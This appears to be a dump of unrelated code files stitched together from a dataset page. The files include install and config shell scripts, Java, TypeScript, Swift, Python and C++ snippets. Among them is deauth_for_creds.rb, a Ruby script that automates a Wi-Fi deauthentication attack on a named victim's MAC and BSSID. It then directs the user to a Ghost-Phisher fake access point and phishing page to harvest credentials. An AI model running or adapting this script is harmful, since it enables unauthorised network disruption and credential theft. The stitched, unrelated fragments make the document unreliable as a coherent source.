        TARGETLIB="/usr/lib/nftp"
    else
        TARGETBIN="/usr/local/bin"
        TARGETLIB="/usr/local/lib/nftp"
    fi
    TARGETDOC="/usr/doc/nftp"
    TARGETMAN="/usr/man/man1"
else
    TARGETBIN=$HOME/bin
    TARGETLIB=$HOME/.nftp
    TARGETDOC=
    TARGETMAN=
fi
# Issue a message for user and wait for decision
clear
echo
echo "NFTP uninstallation."
echo
echo "This script will REMOVE the following files:"
echo
echo "NFTP executable:                   " $TARGETBIN/nftp
if [ $IS_ROOT -eq 1 ]
then
    echo "Directory " $TARGETLIB
    echo "Man page for NFTP:                 " $TARGETMAN/nftp.1
    echo "Documentation:                     " $TARGETDOC"/*"
else
    echo "National language support files:   " $TARGETLIB"/nls/*"
    echo "Template for initialization file:  " $TARGETLIB/nftp.i
    echo "Base bookmark list:                " $TARGETLIB/nftp.bm
    echo "Keynames executable:               " $TARGETLIB/keynames
    echo "Script for uninstalling NFTP:      " $TARGETLIB/uninstall.sh
fi
echo
if [ $IS_ROOT -eq 1 ]
then
    echo "Entire subdirectory " $TARGETLIB " will be removed."
else
    echo "Subdirectory " $TARGETLIB " will not be deleted."
fi
echo "Your personal files in ~/.nftp will be kept intact."
echo "Press ENTER to continue, or Ctrl-C to cancel"
read x
# Remove everything
echo -n "Deleting executables: "
echo $TARGETBIN/nftp
rm -f $TARGETBIN/nftp
if [ $IS_ROOT -eq 1 ]
then
    # Root install keeps everything under one lib directory.
    echo "Removing " $TARGETLIB " directory"
    rm -rf $TARGETLIB
else
    # Per-user install: delete individual support files, keep ~/.nftp itself
    # (it also holds the user's personal configuration).
    echo -n "Deleting support files: "
    echo $TARGETLIB/keynames $TARGETLIB/nftp.i $TARGETLIB/nftp.bm $TARGETLIB/uninstall.sh
    rm -f $TARGETLIB/keynames $TARGETLIB/nftp.i $TARGETLIB/nftp.bm $TARGETLIB/uninstall.sh
    echo -n "Deleting NLS files: "
    echo $TARGETLIB/nls/*.nls $TARGETLIB/nls/*.dos
    rm -f $TARGETLIB/nls/*.nls $TARGETLIB/nls/*.dos
fi
if [ $IS_ROOT -eq 1 ]
then
    echo -n "Deleting manual page and HTML documentation: "
    echo $TARGETMAN/nftp.1 $TARGETDOC/*.html $TARGETDOC/readme.*
    rm -f $TARGETMAN/nftp.1 $TARGETDOC/*.html $TARGETDOC/readme.*
fi
echo "Deinstallation is complete."
|
#!/usr/bin/bash
# Configuration for the ASKAP/SKADS simulation pipeline. This file is meant
# to be *sourced* by a driver script: it only sets variables, and expects
# ${now}, ${simScripts} and ${askapconfig} to already be defined by the
# caller.
# General
parsetdir=parsets
logdir=logs
slurms=slurmFiles
slurmOutput=slurmOutput
msdir=MS
chunkdir=../ModelImages/Chunks
slicedir=../ModelImages/Slices
doCreateModel=false
# Whether to slice up the model prior to simulating - set to false
# if we've already done this
doSlice=false
doCalibrator=false
doScience=true
doCorrupt=false
randomgainsparset=${parsetdir}/randomgains.in
doNoise=true
Tsys=50
#nfeeds=36
nfeeds=1
antennaConfig=ASKAP18
nant=18
pol="XX XY YX YY"
inttime=5s
##################################
# For 1934 calibration observation
#
firstPointingID=0
lastPointingID=`expr ${nfeeds} - 1`
msbaseCal=calibrator_J1934m638_${inttime}_${now}
ra1934=294.854275
ra1934str=19h39m25.036
dec1934=-63.712675
dec1934str=-63.42.45.63
direction1934="[${ra1934str}, ${dec1934str}, J2000]"
. ${simScripts}/makeCalHArange.sh
#Gridding parameters
nw=201
os=8
###############################
# For science field observation
#
msbaseSci=sciencefield_${antennaConfig}_SKADS_${inttime}_${nfeeds}beam_${now}
if [ $nfeeds -eq 36 ]; then
    feeds=${askapconfig}/ASKAP${nfeeds}feeds-footprint-square_6x6.in
else
    feeds=${askapconfig}/ASKAP${nfeeds}feeds.in
fi
antennaParset=${askapconfig}/${antennaConfig}.in
# Time required for the csimulator jobs
TIME_CSIM_JOB=2:30:00
# Set this to true if we want to mimic the correlator layout (48MHz blocks, each producing its own MS)
matchCorrelatorLayout=true
if [ $matchCorrelatorLayout == true ]; then
    # Number of MSs to end up with after 2nd stage of merging
    NUM_FINAL_MS=7
    msbaseSci=sciencefield_${antennaConfig}_by${NUM_FINAL_MS}_SKADS_${inttime}_${nfeeds}beam_${now}
    NGROUPS_CSIM=28
    NWORKERS_CSIM=65
    chanPerMSchunk=10
    NPPN_CSIM=3
    TILENCHAN=54
else
    # Number of MSs to end up with after 2nd stage of merging
    NUM_FINAL_MS=8
    NGROUPS_CSIM=32
    NWORKERS_CSIM=171
    chanPerMSchunk=3
    NPPN_CSIM=3
    TILENCHAN=54
fi
NCPU_CSIM=`echo $NWORKERS_CSIM | awk '{print $1+1}'`
# NGROUPS_CSIM must divide evenly into NUM_FINAL_MS; otherwise disable
# submission (doSubmit is read by the driver script).
if [ `echo $NGROUPS_CSIM $NUM_FINAL_MS | awk '{print $1 % $2 }'` -ne 0 ]; then
    echo "Number of groups (${NGROUPS_CSIM}) not a multiple of number of final MSs (${NUM_FINAL_MS})."
    echo "Not running."
    doSubmit=false
else
    NUM_GROUPS_PER_FINAL=`echo $NGROUPS_CSIM $NUM_FINAL_MS | awk '{print $1/$2}'`
fi
# Whether to remove the intermediate MSs once the merging step has
# completed successfully
CLOBBER_INTERMEDIATE_MS=true
catdir=/group/askap/whi550/Simulations/InputCatalogue
sourcelist=master_possum_catalogue_trim10x10deg.dat
doFlatSpectrum=false
baseimage=SKADS_model_matchADE_${nfeeds}beam
writeByNode=true
createTT_CR=true
npixModel=3072
nsubxCR=9
nsubyCR=5
CREATORTASKS=`echo $nsubxCR $nsubyCR | awk '{print $1*$2+1}'`
CREATORWORKERPERNODE=1
CREATORNODES=`echo $CREATORTASKS ${CREATORWORKERPERNODE} | awk '{print int($1/$2)}'`
SLICERNPPN=20
#databaseCR=POSSUM
databaseCR=POSSUMHI
#databaseCR=joint
posType=deg
PAunits=rad
useGaussianComponents=true
# Pick the source-list type and image suffix for the chosen input database.
if [ $databaseCR == "POSSUM" ]; then
    listtypeCR=continuum
    baseimage="${baseimage}_cont"
elif [ $databaseCR == "POSSUMHI" ]; then
    #listtypeCR=spectralline
    listtypeCR=continuum
    baseimage="${baseimage}_C+HI"
elif [ $databaseCR == "joint" ]; then
    # This is the case for when we've combined the continuum and HI
    # models into "_joint" models
    baseimage="${baseimage}_joint"
fi
modelimage=${chunkdir}/${baseimage}
# Size and pixel scale of spatial axes
npix=$npixModel
rpix=`echo $npix | awk '{print $1/2}'`
cellsize=3
delt=`echo $cellsize | awk '{print $1/3600.}'`
# Central position for the input model
ra=187.5
dec=-45.0
# And how that is translated for the csimulator jobs
raStringVis="12h30m00.000"
decStringVis="-45.00.00"
baseDirection="[${raStringVis}, ${decStringVis}, J2000]"
# Does the catalogue need precessing? If so, central position of catalogue.
WCSsources=true
raCat=0.
decCat=0.
# Spectral axis - full spectral range & resolution
freqChanZeroMHz=1421
nchan=18144
rchan=0
chanw=-18.5185185e3
rfreq=`echo ${freqChanZeroMHz} | awk '{printf "%8.6e",$1*1.e6}'`
basefreq=`echo $nchan $rchan $rfreq $chanw | awk '{printf "%8.6e",$3 + $4*($2+$1/2)}'`
# Polarisation axis - use full stokes for these models
nstokes=4
rstokes=0
stokesZero=0
dstokes=1
spwbaseSci=${parsetdir}/spws_sciencefield
observationLengthHours=8
# duration for csimulator parset - have observation evenly split over
# transit, so give hour angle start/stop times
dur=`echo $observationLengthHours | awk '{print $1/2.}'`
|
package cc.soham.toggle.objects;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
public class Config {
    @SerializedName("name")
    @Expose
    public String name;

    @SerializedName("features")
    @Expose
    public List<Feature> features = new ArrayList<Feature>();

    // a map representing the list of features, supports lookup in constant time O(1)
    // transient: excluded from Gson (de)serialization.
    public transient Map<String, Feature> featureMap = new HashMap<>();

    public Config(String name, List<Feature> features) {
        this.name = name;
        this.features = features;
        generateFeatureMap();
    }

    /**
     * Generates a {@link Map} out of the features {@link List}
     */
    public void generateFeatureMap() {
        featureMap = new HashMap<>();
        if (features != null) {
            for (Feature feature : features) {
                featureMap.put(feature.getName(), feature);
            }
        }
    }

    /**
     * Gets the {@link Map} of features for lookup use.
     * Fix: lazily (re)builds the map when it is null or out of sync with
     * {@code features} — Gson deserialization bypasses the constructor, so
     * the transient map would otherwise never be populated.
     *
     * @return the name-to-feature lookup map (never null)
     */
    public Map<String, Feature> getFeatureMap() {
        if (featureMap == null
                || (featureMap.isEmpty() && features != null && !features.isEmpty())) {
            generateFeatureMap();
        }
        return featureMap;
    }
}
|
/**
* Copyright 2021 <NAME>, Co.Ltd
* Email: <EMAIL>
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.shulie.instrument.module.pradar.core;
import javax.annotation.Resource;
import com.pamirs.pradar.Pradar;
import com.pamirs.pradar.PradarService;
import com.pamirs.pradar.PradarSwitcher;
import com.pamirs.pradar.common.ClassUtils;
import com.pamirs.pradar.debug.DebugHelper;
import com.pamirs.pradar.internal.GlobalConfigService;
import com.pamirs.pradar.internal.PradarInternalService;
import com.pamirs.pradar.pressurement.agent.shared.exit.ArbiterHttpExit;
import com.pamirs.pradar.pressurement.agent.shared.service.EventRouter;
import com.pamirs.pradar.pressurement.agent.shared.service.GlobalConfig;
import com.pamirs.pradar.pressurement.agent.shared.util.PradarSpringUtil;
import com.pamirs.pradar.pressurement.agent.shared.util.TbScheduleUtil;
import com.pamirs.pradar.pressurement.datasource.SqlParser;
import com.pamirs.pradar.pressurement.datasource.util.SqlMetadataParser;
import com.pamirs.pradar.upload.uploader.AgentOnlineUploader;
import com.pamirs.pradar.utils.MonitorCollector;
import com.shulie.instrument.module.pradar.core.handler.DefaultExceptionHandler;
import com.shulie.instrument.module.pradar.core.service.DefaultGlobalConfigService;
import com.shulie.instrument.module.pradar.core.service.DefaultPradarInternalService;
import com.shulie.instrument.module.pradar.core.service.DefaultPradarService;
import com.shulie.instrument.simulator.api.ExtensionModule;
import com.shulie.instrument.simulator.api.ModuleInfo;
import com.shulie.instrument.simulator.api.ModuleLifecycleAdapter;
import com.shulie.instrument.simulator.api.resource.ModuleCommandInvoker;
import com.shulie.instrument.simulator.message.Messager;
import org.kohsuke.MetaInfServices;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
 * Module holding shared/common dependencies for other modules.
 * The packages to be exported to dependent modules must be listed in the
 * module.config file.
 *
 * @author xiaobin.zfb|<EMAIL>
 * @since 2020/10/1 12:22 AM
 */
@MetaInfServices(ExtensionModule.class)
@ModuleInfo(id = "pradar-core", version = "1.0.0", author = "<EMAIL>",
    description = "pradar core 模式,提供链路追踪 trace 埋点以及压测标等服务")
public class PradarCoreModule extends ModuleLifecycleAdapter implements ExtensionModule {
    private final static Logger logger = LoggerFactory.getLogger(PradarCoreModule.class);
    // Periodic system-metrics collector; started on activate, stopped on freeze.
    private MonitorCollector monitorCollector;
    @Resource
    private ModuleCommandInvoker moduleCommandInvoker;

    @Override
    public void onActive() throws Throwable {
        // Copy the simulator home path and all plugin-related settings into
        // system properties so that other components can read them.
        String home = simulatorConfig.getSimulatorHome();
        if (home != null) {
            System.setProperty("simulator.home", home);
        }
        Integer requestSize = simulatorConfig.getIntProperty("plugin.request.size");
        if (requestSize != null) {
            System.setProperty("plugin.request.size", String.valueOf(requestSize));
        }
        Integer responseSize = simulatorConfig.getIntProperty("plugin.response.size");
        if (responseSize != null) {
            System.setProperty("plugin.response.size", String.valueOf(responseSize));
        }
        Boolean requestOn = simulatorConfig.getBooleanProperty("plugin.request.on");
        if (requestOn != null) {
            System.setProperty("plugin.request.on", String.valueOf(requestOn));
        }
        Boolean responseOn = simulatorConfig.getBooleanProperty("plugin.response.on");
        if (responseOn != null) {
            System.setProperty("plugin.response.on", String.valueOf(responseOn));
        }
        // Install the default implementations of the Pradar service facades.
        PradarService.registerPradarService(new DefaultPradarService());
        PradarInternalService.registerService(new DefaultPradarInternalService());
        DebugHelper.registerModuleCommandInvoker(moduleCommandInvoker);
        GlobalConfigService.registerService(new DefaultGlobalConfigService());
        /**
         * Register the custom exception handler for this namespace.
         */
        Messager.registerExceptionHandler(simulatorConfig.getNamespace(), new DefaultExceptionHandler());
        monitorCollector = MonitorCollector.getInstance();
        monitorCollector.start();
    }

    @Override
    public void onFrozen() throws Throwable {
        // Stop background activity but keep registrations in place.
        EventRouter.router().shutdown();
        AgentOnlineUploader.getInstance().shutdown();
        if (monitorCollector != null) {
            monitorCollector.stop();
        }
        Pradar.shutdown();
    }

    @Override
    public void onUnload() throws Throwable {
        // Unregister all facades and release every shared/static resource so
        // the module can be reloaded without leaking state.
        PradarService.registerPradarService(null);
        PradarInternalService.registerService(null);
        GlobalConfigService.registerService(null);
        GlobalConfig.getInstance().release();
        PradarSwitcher.destroy();
        ArbiterHttpExit.release();
        SqlParser.release();
        ClassUtils.release();
        PradarSpringUtil.release();
        TbScheduleUtil.release();
        SqlMetadataParser.clear();
    }
}
|
<filename>deauth_for_creds.rb
#!/bin/ruby
print("Please open Ghost-Phisher on your Kali machine.
")
print("Before continuing, I will need to know the name of the interface that you plan on using for this
attack. Name of interface:
")
interface = gets.chomp
system("sed -i 's/interface/#{interface}/g' airodump.sh")
system("chmod +x airodump.sh")
system("bash airodump.sh")
print("What is the name of the BSSID that your victim
is connected to:
")
bssid = gets.chomp
system("ifconfig #{interface} down")
system("iwconfig #{interface} mode monitor")
system("ifconfig #{interface} up")
system("sed -i 's/bssid1/#{bssid}/g' airodump_mac.sh")
system("sed -i 's/interface/#{interface}/g' airodump_mac.sh")
system("ifconfig #{interface} down")
system("iwconfig #{interface} mode managed")
system("ifconfig #{interface} up")
system("chmod +x airodump_mac.sh")
system("bash airodump_mac.sh")
print("What is the MAC address of your victim:
")
victim_mac = gets.chomp
print("WARNING: DO NOT CLOSE THE TERMINAL ABOUT TO BE OPENED!!!")
system("sed -i 's/bssid/#{bssid}/g' deauth.sh")
system("sed -i 's/victim_mac/#{victim_mac}/g' deauth.sh")
system("sed -i 's/interface/#{interface}/g' deauth.sh")
system("chmod +x deauth.sh")
system("bash deauth.sh")
print("In Ghost-Phisher, please create an access point, using
a wireless card other than the #{interface}.
")
print("Go to the 'Fake HTTP Server' tab and click on 'Select
Webpage,' select one of the HTML files in the 'Deauth_for_Creds'
folder.")
print("Go to the 'Harvested Credentials' tab and look for your
victim's information.")
print("Kill the terminal running the deauth attack.")
print("Enjoy your creds!")
|
<reponame>blu-world/shengji
import * as React from "react";
import {
ITrump,
ITrickUnit,
IBid,
IHands,
IPlayer,
IUnitLike,
ITrickFormat,
BidPolicy,
BidReinforcementPolicy,
IDeck,
ITrick,
TrickDrawPolicy,
IGameScoringParameters,
JokerBidPolicy,
ITractorRequirements,
} from "./types";
/**
 * Game-logic API surface backed by the WASM engine. Components obtain an
 * implementation of this interface through `WasmContext` rather than calling
 * into the WASM module directly.
 */
interface Context {
  /** Lists the viable groupings of `cards` under `trump`. */
  findViablePlays: (
    trump: ITrump,
    tractorRequirements: ITractorRequirements,
    cards: string[]
  ) => IFoundViablePlay[];
  /** Computes the bids the requesting player may currently make. */
  findValidBids: (req: IFindValidBidsRequest) => IBid[];
  /** Sorts cards and groups them by suit. */
  sortAndGroupCards: (
    req: ISortAndGroupCardsRequest
  ) => ISortedAndGroupedCards[];
  /** Breaks a trick format down into the ways it could be followed. */
  decomposeTrickFormat: (
    req: IDecomposeTrickFormatRequest
  ) => IDecomposedTrickFormat[];
  /** Whether the given cards are a legal play on the current trick. */
  canPlayCards: (req: ICanPlayCardsRequest) => boolean;
  /** Maps point thresholds to game results under the scoring parameters. */
  explainScoring: (req: IExplainScoringRequest) => IExplainScoringResponse;
  /** Whether the next point threshold can still be reached. */
  nextThresholdReachable: (req: INextThresholdReachableRequest) => boolean;
  /** Computes the game result for a given point total. */
  computeScore: (req: IComputeScoreRequest) => IComputeScoreResponse;
  /** Total number of cards across the given decks. */
  computeDeckLen: (req: IDeck[]) => number;
  /** Decodes a server message from its wire format (shape is dynamic). */
  decodeWireFormat: (req: any) => any;
}
/** One viable way to play a set of cards, with a human-readable description. */
export interface IFoundViablePlay {
  grouping: ITrickUnit[];
  description: string;
}
/** Request payload for `Context.findValidBids`. */
interface IFindValidBidsRequest {
  /** Player id of the prospective bidder. */
  id: number;
  bids: IBid[];
  hands: IHands;
  players: IPlayer[];
  /** Landlord's player id; null when no landlord is set. */
  landlord: number | null;
  epoch: number;
  bid_policy: BidPolicy;
  bid_reinforcement_policy: BidReinforcementPolicy;
  joker_bid_policy: JokerBidPolicy;
  num_decks: number;
}
/** Request payload for `Context.sortAndGroupCards`. */
interface ISortAndGroupCardsRequest {
  /** Trump used for ordering; null sorts without trump context. */
  trump: ITrump | null;
  cards: string[];
}
/** Cards belonging to a single suit, as produced by `sortAndGroupCards`. */
export interface ISortedAndGroupedCards {
  suit: string;
  cards: string[];
}
/** One decomposition of a trick format plus the cards playable against it. */
interface IDecomposedTrickFormat {
  description: string;
  format: IUnitLike[];
  playable: string[];
}
/** Request payload for `Context.decomposeTrickFormat`. */
interface IDecomposeTrickFormatRequest {
  trick_format: ITrickFormat;
  hands: IHands;
  player_id: number;
  trick_draw_policy: TrickDrawPolicy;
}
/** Request payload for `Context.canPlayCards`. */
interface ICanPlayCardsRequest {
  trick: ITrick;
  /** Player id attempting the play. */
  id: number;
  hands: IHands;
  cards: string[];
  trick_draw_policy: TrickDrawPolicy;
}
/** Request payload for `Context.explainScoring`. */
interface IExplainScoringRequest {
  decks: IDeck[];
  params: IGameScoringParameters;
  smaller_landlord_team_size: boolean;
}
/** Request payload for `Context.nextThresholdReachable`. */
interface INextThresholdReachableRequest {
  decks: IDeck[];
  params: IGameScoringParameters;
  non_landlord_points: number;
  observed_points: number;
}
/** A point threshold paired with the game result it produces. */
export interface IScoreSegment {
  point_threshold: number;
  results: IGameScoreResult;
}
/** Outcome of a game: which side won and each side's rank delta. */
interface IGameScoreResult {
  landlord_won: boolean;
  landlord_bonus: boolean;
  landlord_delta: number;
  non_landlord_delta: number;
}
/** Request payload for `Context.computeScore`. */
interface IComputeScoreRequest {
  decks: IDeck[];
  params: IGameScoringParameters;
  smaller_landlord_team_size: boolean;
  non_landlord_points: number;
}
/** Response of `Context.computeScore`. */
interface IComputeScoreResponse {
  score: IGameScoreResult;
  next_threshold: number;
}
/** Response of `Context.explainScoring`. */
interface IExplainScoringResponse {
  results: IScoreSegment[];
  step_size: number;
  total_points: number;
}
/**
 * Inert placeholder implementation of `Context`, used as the context default
 * before a real WASM-backed implementation is provided: every method returns
 * an empty or neutral value.
 */
const placeholderContext: Context = {
  findViablePlays: (_trump, _requirements) => [],
  findValidBids: (_req) => [],
  sortAndGroupCards: (_req) => [],
  decomposeTrickFormat: (_req) => [],
  canPlayCards: (_req) => false,
  explainScoring: (_req) => ({ results: [], step_size: 0, total_points: 0 }),
  nextThresholdReachable: (_req) => true,
  computeScore: (_req) => ({
    score: {
      landlord_won: true,
      landlord_bonus: false,
      landlord_delta: 0,
      non_landlord_delta: 0,
    },
    next_threshold: 0,
  }),
  computeDeckLen: (_req) => 0,
  decodeWireFormat: (_req) => {},
};

export const WasmContext = React.createContext<Context>(placeholderContext);
export default WasmContext;
|
export const actions = {
async nuxtServerInit({ commit }, { $content }) {
try {
// Add Druxt modules to Vuex store.
const modulesIndex = await $content("api/README").only("toc").fetch()
const modules = await Promise.all(modulesIndex.toc
.filter((o) => o.id !== 'druxt')
.map((o) =>
$content(`modules/${o.id.split("-")[1]}/README`)
.only(["description", "dir", "title"])
.fetch()
)
)
commit("setModules", modules);
// Add Modules menu children to the vuex store.
const moduleChildren = modules
.map((o) => ({
component: "NuxtLink",
text: o.title,
props: { to: o.dir },
}));
commit("addMenuChildren", { children: moduleChildren, parent: "/modules" });
// Add Guide menu children to the vuex store.
const guideIndex = await $content("guide")
.sortBy("weight")
.only(["path", "title", "weight"])
.fetch();
const guideChildren = guideIndex.map((o) => ({
component: "NuxtLink",
text: o.title,
props: { to: o.path.replace("/README", "") },
}));
commit("addMenuChildren", { children: guideChildren, parent: "/guide" });
// Add API menu children to the vuex store.
const apiIndex = await $content("api").only(["path", "title"]).fetch();
const apiChildren = apiIndex.map((o) => ({
component: "NuxtLink",
text: o.title,
props: { to: o.path.replace("/README", "") },
}));
commit("addMenuChildren", { children: apiChildren, parent: "/api" });
} catch (err) {
console.log(err)
}
}
}
|
import SwiftUI
import LoopKitUI
/// Guides the user through the cannula insertion flow and asks for a final
/// confirmation (via a sheet) before proceeding.
struct InsertCannulaView: View {
    @ObservedObject var viewModel: InsertCannulaViewModel
    @Environment(\.verticalSizeClass) var verticalSizeClass
    // Renamed from `cancelModalIsPresented`: the sheet this flag drives is
    // the insertion *confirmation* dialog, not a cancellation dialog.
    @State private var confirmationModalIsPresented: Bool = false

    var body: some View {
        VStack {
            // Other view components for guiding the user through cannula insertion process
            Button(action: {
                self.confirmationModalIsPresented = true
            }) {
                Text("Confirm Cannula Insertion")
            }
        }
        .sheet(isPresented: $confirmationModalIsPresented) {
            ConfirmationModalView(isPresented: self.$confirmationModalIsPresented)
        }
    }
}
/// Modal asking the user to confirm or abort cannula insertion. Both choices
/// dismiss the sheet by clearing the bound presentation flag.
struct ConfirmationModalView: View {
    @Binding var isPresented: Bool

    /// Clears the binding so the presenting view dismisses this sheet.
    private func dismiss() {
        isPresented = false
    }

    var body: some View {
        VStack {
            Text("Are you sure you want to insert the cannula?")
            HStack {
                // Perform action to confirm cannula insertion
                Button("Confirm", action: dismiss)
                // Perform action to cancel cannula insertion
                Button("Cancel", action: dismiss)
            }
        }
    }
}
# Build and print an m-by-n matrix whose (i, j) entry is i * j.
#
# NOTE(review): the original comments called this a "sparse matrix", but the
# result is a dense nested list; only its many zero entries make it sparse in
# *content*, not in storage format.


def build_product_matrix(m, n):
    """Return an m x n nested list with entry [i][j] == i * j."""
    return [[i * j for j in range(n)] for i in range(m)]


# Matrix dimensions.
m = 2
n = 2

sparseMatrix = build_product_matrix(m, n)

# Print the matrix, one row per line, entries separated by single spaces
# (each entry is followed by a space, matching the original output exactly).
for row in sparseMatrix:
    for value in row:
        print(value, end=" ")
    print()
#!/bin/sh
# Report upload progress for bucket $1:
#   "Queued:"   items still pending, as counted by check-queue.pl
#   "Finished:" objects already present in s3://$1/
#
# Usage: ./progress.sh <bucket-name>

# `echo -n` is not portable in POSIX sh (some shells print a literal "-n");
# printf is the portable way to emit text without a trailing newline.
printf '%s' "Queued: "
./check-queue.pl "$1"
printf '%s' "Finished: "
../s3cmd-1.0.0/s3cmd ls "s3://$1/" | wc -l
|
// Ceres Solver - A fast non-linear least squares minimizer
// Copyright 2015 Google Inc. All rights reserved.
// http://ceres-solver.org/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
// * Neither the name of Google Inc. nor the names of its contributors may be
// used to endorse or promote products derived from this software without
// specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
// Author: <EMAIL> (<NAME>)
// <EMAIL> (<NAME>)
#include "ceres/evaluator_test_utils.h"
#include "ceres/internal/eigen.h"
#include "gtest/gtest.h"
namespace ceres {
namespace internal {

// Compares an actual evaluation (cost, residuals, gradient, Jacobian) against
// expected values, reporting mismatches through gtest EXPECT_* macros so the
// enclosing test fails but execution continues.
//
// Comparisons use exact element-wise floating-point equality (operator==),
// so expected values must be bit-identical to the computed ones.  Each of
// expected_residuals / expected_gradient / expected_jacobian may be null to
// skip that comparison; the matching actual_* pointer is only dereferenced
// when its expected counterpart is non-null.
void CompareEvaluations(int expected_num_rows,
                        int expected_num_cols,
                        double expected_cost,
                        const double* expected_residuals,
                        const double* expected_gradient,
                        const double* expected_jacobian,
                        const double actual_cost,
                        const double* actual_residuals,
                        const double* actual_gradient,
                        const double* actual_jacobian) {
  EXPECT_EQ(expected_cost, actual_cost);
  // Residuals: compared as vectors of length expected_num_rows.
  if (expected_residuals != nullptr) {
    ConstVectorRef expected_residuals_vector(expected_residuals,
                                             expected_num_rows);
    ConstVectorRef actual_residuals_vector(actual_residuals, expected_num_rows);
    EXPECT_TRUE(
        (actual_residuals_vector.array() == expected_residuals_vector.array())
            .all())
        << "Actual:\n"
        << actual_residuals_vector << "\nExpected:\n"
        << expected_residuals_vector;
  }
  // Gradient: compared as vectors of length expected_num_cols (printed
  // transposed so the failure message fits on one line).
  if (expected_gradient != nullptr) {
    ConstVectorRef expected_gradient_vector(expected_gradient,
                                            expected_num_cols);
    ConstVectorRef actual_gradient_vector(actual_gradient, expected_num_cols);
    EXPECT_TRUE(
        (actual_gradient_vector.array() == expected_gradient_vector.array())
            .all())
        << "Actual:\n"
        << actual_gradient_vector.transpose() << "\nExpected:\n"
        << expected_gradient_vector.transpose();
  }
  // Jacobian: compared as dense expected_num_rows x expected_num_cols
  // matrices built over the raw buffers.
  if (expected_jacobian != nullptr) {
    ConstMatrixRef expected_jacobian_matrix(
        expected_jacobian, expected_num_rows, expected_num_cols);
    ConstMatrixRef actual_jacobian_matrix(
        actual_jacobian, expected_num_rows, expected_num_cols);
    EXPECT_TRUE(
        (actual_jacobian_matrix.array() == expected_jacobian_matrix.array())
            .all())
        << "Actual:\n"
        << actual_jacobian_matrix << "\nExpected:\n"
        << expected_jacobian_matrix;
  }
}

}  // namespace internal
}  // namespace ceres
|
"""
A Python function to determine whether two given strings are anagrams of each other
"""
def check_anagram(string1, string2):
    """Return True if string1 and string2 are anagrams of each other.

    The comparison is case-sensitive ('S' != 's'), matching the original
    implementation: "Stop" and "post" are NOT considered anagrams.

    :param string1: first string to compare
    :param string2: second string to compare
    :return: True when both strings contain exactly the same characters
        with the same frequencies, False otherwise
    """
    # Local import keeps this block self-contained within the file.
    from collections import Counter

    # Strings of different lengths cannot be anagrams; cheap early exit
    # before building the frequency counts.
    if len(string1) != len(string2):
        return False
    # Two strings are anagrams exactly when their character-frequency
    # multisets are identical. Counter replaces the hand-rolled dict
    # bookkeeping of the original implementation.
    return Counter(string1) == Counter(string2)
if __name__ == '__main__':
    # Demo: the check is case-sensitive, so "Stop" vs "post" prints False.
    first, second = "Stop", "post"
    print(check_anagram(first, second))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.